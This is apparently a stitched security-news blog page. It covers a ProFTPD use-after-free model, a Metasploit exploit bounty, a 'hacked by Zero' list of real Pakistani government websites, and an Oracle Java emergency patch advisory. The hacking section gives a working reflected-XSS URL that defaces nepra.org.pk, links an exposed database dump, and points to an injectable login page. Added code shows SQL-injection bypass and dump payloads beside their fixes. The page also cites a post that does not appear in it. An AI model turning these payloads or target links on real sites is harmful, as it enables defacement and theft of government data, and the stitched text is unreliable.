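"""Model of the ProFTPD response-pool bug: the dispatcher saves the response
pool, switches to a per-command pool, and on a PRE_CMD error returns without
restoring it, so the next response is written through a stale pointer.
Added illustration, not ProFTPD's code; all names are the model's own."""


class Pool:
    """Stand-in for a ProFTPD memory pool: unusable once destroyed."""

    def __init__(self, name):
        self.name = name
        self.alive = True
        self.responses = []

    def destroy(self):
        self.alive = False
        self.responses.clear()


class Server:
    def __init__(self):
        # Session-wide pool that resp_pool normally points at.
        self.resp_pool = Pool("permanent")

    # Equivalents of pr_response_get_pool() / pr_response_set_pool().
    def get_pool(self):
        return self.resp_pool

    def set_pool(self, pool):
        self.resp_pool = pool

    def respond(self, text):
        """Like pr_response_add(): writes into whatever resp_pool points at."""
        if not self.resp_pool.alive:
            raise RuntimeError(
                "use-after-free: response written into destroyed pool %r"
                % self.resp_pool.name)
        self.resp_pool.responses.append(text)


def dispatch_buggy(server, precmd_ok):
    """Pre-1.3.3g shape: an early return on PRE_CMD error skips the restore."""
    saved = server.get_pool()
    cmd_pool = Pool("command")
    server.set_pool(cmd_pool)
    if not precmd_ok:
        cmd_pool.destroy()      # command pool torn down (assumed) ...
        return "error"          # ... but resp_pool still points at it
    server.respond("200 OK")
    server.set_pool(saved)
    cmd_pool.destroy()
    return "ok"


def dispatch_fixed(server, precmd_ok):
    """Fix: restore the saved pool on every path out of the dispatcher."""
    saved = server.get_pool()
    cmd_pool = Pool("command")
    server.set_pool(cmd_pool)
    try:
        if not precmd_ok:
            return "error"
        server.respond("200 OK")
        return "ok"
    finally:
        server.set_pool(saved)
        cmd_pool.destroy()


def next_response_survives(dispatch):
    """Run a failing command, then a normal response.

    True if the follow-up response lands in a live pool, False if it hits
    the dangling pointer left behind by the dispatcher."""
    server = Server()
    dispatch(server, precmd_ok=False)
    try:
        server.respond("500 Command not understood")
        return True
    except RuntimeError:
        return False


if __name__ == "__main__":
    print("fixed dispatcher survives:", next_response_survives(dispatch_fixed))
    print("buggy dispatcher survives:", next_response_survives(dispatch_buggy))
```

Running it shows the fixed dispatcher surviving a failed command followed by a normal response, while the buggy one writes its next response through a pointer to a pool that no longer exists. In the real daemon that write lands in freed heap memory, which is what turns a missed restore into a use-after-free rather than a simple crash.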

The new versions, ProFTPD 1.3.3g and 1.3.4, are available now.

To download them click Here



Metasploit Announces $5,000, 5-Week Bug Bounty Program for Exploits


If you've got a way to crack Google Chrome, the Metasploit team wants to pay you for it. Today Rapid7 announced that it has a total of $5,000 in cash to reward contributors who send in exploits for its Top 5 or Top 25 vulnerability lists. The exploits have to be submitted, and accepted, as modules under the standard Metasploit Framework license.
Cash for bugs is a controversial but common way for security firms to encourage hackers to send exploits to the white hats. As bug bounty programs go, Metasploit's is meager. But for an open source project that relies on contributions sent in for free, it's an interesting experiment. The program will end quickly, lasting only five weeks (until July 20). One fun thing the team is doing is letting people stake a claim to their exploit of choice from the Top 5 (prize $500) or Top 25 (prize $100) lists. After claiming an exploit, hackers get a week to submit their Metasploit module for the chosen bug. The prize money will "only be paid out to the first module contributor for a given vulnerability," the Metasploit team says.
And guess what? Denial-of-service exploits won't qualify; Metasploit wants your bug to do more than that. The module should also bypass ASLR/DEP where applicable and be geared toward English-language targets. Metasploit wants hackers to follow its exploit-writing guidelines, and they cannot be residents of a US-embargoed country.
All accepted submissions will not only win a bit of cash; the modules will also be made available to other Metasploit users, again under the Metasploit Framework license (3-clause BSD).
As I look at the list of 30 possible exploits while writing this post, I see that only two have been claimed so far: CVE-2011-1218 / ZDI, Lotus Notes Autonomy KeyView (.zip attachment), and an exploit not listed in the CVE database, known as "DATAC RealWin On_FC_CONNECT_FCS_LOGIN packet containing a long username." So plenty of room for participants remains.
The cash-for-bugs program is interesting, but the list of vulnerabilities for which Metasploit is seeking help is even more so.

The Top 5 are for specific holes in:
  1. Google Chrome (before 11.0.696.71)
  2. Lotus Notes
  3. IBM Tivoli Directory Server
  4. DNS
  5. GDI
In the Top 25, the entries that caught my eye include holes in the JScript and VBScript scripting engines, JBoss, Oracle VM and Citrix, among others. (Yes, browsers are in there too, including Firefox, Chrome and Opera.)
Of course, if you do have a killer bug, particularly for one of the browsers like Firefox or Chrome, you can perhaps earn more than $100 for it. Mozilla's bug bounty program pays up to $3,000 in cash, plus a Mozilla T-shirt. For security bugs in web applications or services, Mozilla pays from $500 to $3,000. In January, Google paid out what was then a record reward, $3,133, to a hacker for reporting a flaw in Chrome. (Google raised its bug bounty about a year ago from $1,337, after Mozilla bumped its reward rate up to $3,000.)
TippingPoint, known as one of the founders of the bug bounty concept, not only pays cash (as much as $5,000 for your zero-day), but it also awards bonus points in a scheme more complicated than an airline mileage rewards program. Participants earn points for referring others into the program, for each zero-day they submit and so on. These points gain you bonuses for your hacks, and other goodies like all-expense-paid trips to hacker conferences like Black Hat.
Who knew hacking could be so rewarding?


Vulnerabilities Found By Zero in Multiple Pakistan Govt. Sites



Vulnerable Website:- 
http://www.lesco.gov.pk/

Exposed DB Link:-
http://pastebin.com/PwS73kAu



XSS in the National Electric Power Regulatory Authority (NEPRA) website of Pakistan

Vulnerable Website:- 
http://www.nepra.org.pk/


Vulnerable Link:-
http://www.nepra.org.pk/searchresult.html?sw=%3E%22%3E%3CMARQUEE%3EHACKED%20BY%20ZERO%20COOL%3C/MARQUEE%3E%3Ciframe+src+%3D%22http%3A%2F%2Fwww.voiceofgreyhat.com%22+width%3D%22100%25%22+height%3D%22100%25%22%3E%3C%2Fiframe%3E&Submit=Go&btnG=Search&site=default_collection&client=default09&proxystylesheet=default09&output=xml_no_dtd
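The payload in that link can be understood without touching the site. The Python below is added here and is not the NEPRA site's code or part of the original post: it decodes the sw parameter from the link (with the trailing search-engine parameters trimmed), reflects it into a hypothetical results-page template the way a vulnerable page would, and then renders the same template with output encoding applied. The template and the function names are the example's own assumptions.

```python
"""Reflected XSS: what the NEPRA search URL injects, and how output encoding
stops it.  Added example; the template is hypothetical, not the site's."""
from html import escape
from html.parser import HTMLParser
from urllib.parse import parse_qs, urlsplit

# The vulnerable link from the post, trailing search-engine parameters trimmed.
VULN_URL = (
    "http://www.nepra.org.pk/searchresult.html?sw=%3E%22%3E%3CMARQUEE%3E"
    "HACKED%20BY%20ZERO%20COOL%3C/MARQUEE%3E%3Ciframe+src+%3D%22http%3A%2F%2F"
    "www.voiceofgreyhat.com%22+width%3D%22100%25%22+height%3D%22100%25%22%3E"
    "%3C%2Fiframe%3E&Submit=Go"
)

# Hypothetical shape of the results page: the search term is echoed back
# inside a quoted attribute.  The real template is not known.
TEMPLATE = '<p>Results for: <input type="text" name="sw" value="{sw}"></p>'


def search_term(url):
    """Return the decoded ``sw`` query parameter (parse_qs turns '+' into space)."""
    return parse_qs(urlsplit(url).query).get("sw", [""])[0]


def render_unsafe(sw):
    """Vulnerable behaviour: the raw parameter is pasted into the markup."""
    return TEMPLATE.format(sw=sw)


def render_safe(sw):
    """Fixed behaviour: <, >, &, " and ' are encoded, so the term stays text."""
    return TEMPLATE.format(sw=escape(sw, quote=True))


class _TagCollector(HTMLParser):
    """Records every start tag a browser-like parser would see."""

    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)


def tags_in(html):
    """Tags present in the page; anything beyond the template's p/input was injected."""
    collector = _TagCollector()
    collector.feed(html)
    return collector.tags


if __name__ == "__main__":
    term = search_term(VULN_URL)
    print(term)
    print(tags_in(render_unsafe(term)))   # marquee and iframe appear: injected
    print(tags_in(render_safe(term)))     # only the template's own tags
```

The decoded term starts with `>">`, which closes the value attribute and the input tag before the MARQUEE and iframe markup begins; that is why the payload works in an attribute context. Escaping with quote=True is the minimal fix for this context, and the same check (count the tags that come out versus the tags the template put in) is a quick way to confirm an encoding fix actually holds.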



Vulnerable Website:- 
http://fesco.com.pk/

Vulnerable SQL-i Link:-
http://fesco.com.pk/GRID-STATION/grid-user-pass.asp
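Both the railway.gov.lk post above and the fesco.com.pk login page here are SQL injection cases. As an added example, and not the code of either site, the Python below builds a constructed in-memory SQLite user table, runs a login query the vulnerable way (string concatenation) and the correct way (bound parameters), and feeds both an authentication-bypass payload and a table-dump payload of the kind that makes the "DB name, tables and admin details" exposure described above possible. The table layout, the sample rows and the function names are the example's own.

```python
"""SQL injection: a login query built by concatenation beside its
parameterised fix, run against a constructed in-memory SQLite database.
Added example; not the code of any site mentioned in the post."""
import sqlite3


def make_db():
    """Constructed sample data standing in for a site's user table."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, "
        "password TEXT, role TEXT)")
    conn.executemany(
        "INSERT INTO users (username, password, role) VALUES (?, ?, ?)",
        [("admin", "s3cret!", "admin"), ("guest", "guest", "user")])
    return conn


def login_unsafe(conn, username, password):
    """Vulnerable: user input is spliced into the SQL text itself."""
    sql = ("SELECT username, role, password FROM users WHERE username = '"
           + username + "' AND password = '" + password + "'")
    return conn.execute(sql).fetchall()


def login_safe(conn, username, password):
    """Fixed: placeholders send the input to the engine as data, never as SQL."""
    sql = ("SELECT username, role, password FROM users "
           "WHERE username = ? AND password = ?")
    return conn.execute(sql, (username, password)).fetchall()


# The two classic payload kinds the posts describe.
BYPASS = "admin' -- "   # the comment marker discards the password check
DUMP = "x' UNION SELECT name, sql, '' FROM sqlite_master -- "  # schema dump


if __name__ == "__main__":
    db = make_db()
    print(login_unsafe(db, BYPASS, "wrong"))  # admin row, password never checked
    print(login_unsafe(db, DUMP, "wrong"))    # every table and its CREATE statement
    print(login_safe(db, BYPASS, "wrong"))    # [] : payload treated as a literal name
```

The bypass works because the query becomes `... WHERE username = 'admin' -- ' AND password = 'wrong'` and everything after `--` is a comment. The UNION payload needs the same number of columns as the original SELECT (three here), which is why real-world dumps start by probing the column count. With bound parameters the same strings are compared as literal usernames and match nothing.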

Directory traversal vulnerability on the Islamabad Electric Supply Company website: with this vulnerability a remote user can see the content without being logged in to the admin area.

Vulnerable Website:-
http://www.iesco.com.pk/



Pakistan Construction Association admin panel hacked
Vulnerable Website:-
http://www.apca.org.pk/


Oracle Released Emergency Update to Patch Java 0day (CVE-2012-4681)


The zero-day vulnerability in Java that has been in the spotlight for the last few days has taken a new direction. Several security firms have reported that the newly found Java exploit has been added to Blackhole, a popular exploit kit that bundles numerous exploits and tries each in turn until it finds one that works against a personal computer. As expected, Oracle has released an emergency update to address the zero-day vulnerabilities. This Security Alert addresses CVE-2012-4681 (US-CERT Alert TA12-240A and Vulnerability Note VU#636312) and two other vulnerabilities affecting Java running in web browsers on desktops. These vulnerabilities are not applicable to Java running on servers or to standalone Java desktop applications. They also do not affect Oracle server-based software.
These vulnerabilities may be remotely exploitable without authentication, i.e., they may be exploited over a network without the need for a username and password. To be successfully exploited, an unsuspecting user running an affected release in a browser will need to visit a malicious web page that leverages this vulnerability. Successful exploits can impact the availability, integrity, and confidentiality of the user's system.
In addition, this Security Alert includes a security-in-depth fix in the AWT subcomponent of the Java Runtime Environment.
Due to the severity of these vulnerabilities, the public disclosure of technical details and the reported exploitation of CVE-2012-4681 "in the wild," Oracle strongly recommends that customers apply the updates provided by this Security Alert as soon as possible.

Supported Products Affected

Security vulnerabilities addressed by this Security Alert affect the products listed below. The patch documentation is reached through the Patch Availability column of Oracle's advisory.

Affected product releases and versions:

  Product          Affected versions                    Patch Availability
  Java SE          JDK and JRE 7 Update 6 and before    Java SE
  Java SE          JDK and JRE 6 Update 34 and before   Java SE

Patch Availability Table and Risk Matrix

Java SE fixes in this Security Alert are cumulative; this latest update includes all fixes from previous Critical Patch Updates and Security Alerts.

Patch Availability Table

  Product Group     Risk Matrix                       Patch Availability and Installation Information
  Oracle Java SE    Oracle JDK and JRE Risk Matrix

Also Java 7 Update 7 is now available to download for Windows (32- and 64-bit), Linux (32- and 64-bit), Mac OS X (64-bit), Solaris x86 (32- and 64-bit) and Solaris SPARC (32- and 64-bit). JDKs with the updated Java runtimes are also available. Users with Java installed on their systems, whatever operating system, should install the updates as soon as possible because malicious software that uses the vulnerability is already in circulation. For detailed information click here

